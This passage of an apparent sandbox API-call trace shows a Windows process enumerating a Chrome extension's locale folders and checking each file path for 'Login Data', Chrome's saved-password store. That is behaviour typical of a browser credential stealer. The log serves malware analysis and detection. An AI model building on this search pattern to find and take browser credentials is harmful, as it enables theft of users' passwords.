Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.686] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.686] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.686] lstrlenW (lpString="es") returned 2 [0161.686] GetProcessHeap () returned 0x8e0000 [0161.686] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.686] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" [0161.686] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.686] GetProcessHeap () returned 0x8e0000 [0161.686] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.686] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned 137 [0161.686] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned 137 [0161.686] lstrlenW (lpString="\\*.*") returned 4 [0161.686] GetProcessHeap () returned 0x8e0000 [0161.686] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.687] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" [0161.687] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*.*" [0161.687] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.688] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.688] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.688] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.688] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.688] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.688] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned 137 [0161.688] lstrlenW (lpString="\\") returned 1 [0161.688] GetProcessHeap () returned 0x8e0000 [0161.688] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.688] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" [0161.688] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\" [0161.688] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\") returned 138 [0161.688] lstrlenW (lpString="messages.json") returned 13 [0161.688] GetProcessHeap () returned 0x8e0000 [0161.688] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.688] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\" [0161.688] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" [0161.688] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.688] GetProcessHeap () returned 0x8e0000 [0161.688] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.688] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json", lpSrch="Login Data") returned 0x0 [0161.688] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.688] GetProcessHeap () returned 0x8e0000 [0161.689] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.689] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.689] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.689] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.689] GetProcessHeap () returned 0x8e0000 [0161.689] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.689] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.689] GetProcessHeap () returned 0x8e0000 [0161.689] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.689] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="es_419", cAlternateFileName="")) returned 1 [0161.689] lstrcmpiW (lpString1="es_419", lpString2=".") returned 1 [0161.689] lstrcmpiW (lpString1="es_419", lpString2="..") returned 1 [0161.689] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.689] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.689] lstrlenW (lpString="\\") returned 1 [0161.689] GetProcessHeap () returned 0x8e0000 [0161.689] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.689] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.689] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.689] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.689] lstrlenW (lpString="es_419") returned 6 [0161.689] GetProcessHeap () returned 0x8e0000 [0161.689] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x925dd8 [0161.689] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.689] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" [0161.689] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.689] GetProcessHeap () returned 0x8e0000 [0161.689] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.689] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned 141 [0161.689] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned 141 [0161.689] lstrlenW (lpString="\\*.*") returned 4 [0161.689] GetProcessHeap () returned 0x8e0000 [0161.689] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x124) returned 0x91a0a8 [0161.690] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" [0161.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*.*" [0161.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.690] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.690] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.690] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.690] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.690] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.690] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned 141 [0161.690] lstrlenW (lpString="\\") returned 1 [0161.690] GetProcessHeap () returned 0x8e0000 [0161.690] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11e) returned 0x91b1e0 [0161.690] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" [0161.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\" [0161.690] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\") returned 142 [0161.690] lstrlenW (lpString="messages.json") returned 13 [0161.690] GetProcessHeap () returned 0x8e0000 [0161.690] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x138) returned 0x91b308 [0161.690] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\" [0161.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" [0161.690] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.690] GetProcessHeap () returned 0x8e0000 [0161.690] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.690] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json", lpSrch="Login Data") returned 0x0 [0161.690] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.690] GetProcessHeap () returned 0x8e0000 [0161.691] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.691] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.691] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.691] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.691] GetProcessHeap () returned 0x8e0000 [0161.691] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.691] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.691] GetProcessHeap () returned 0x8e0000 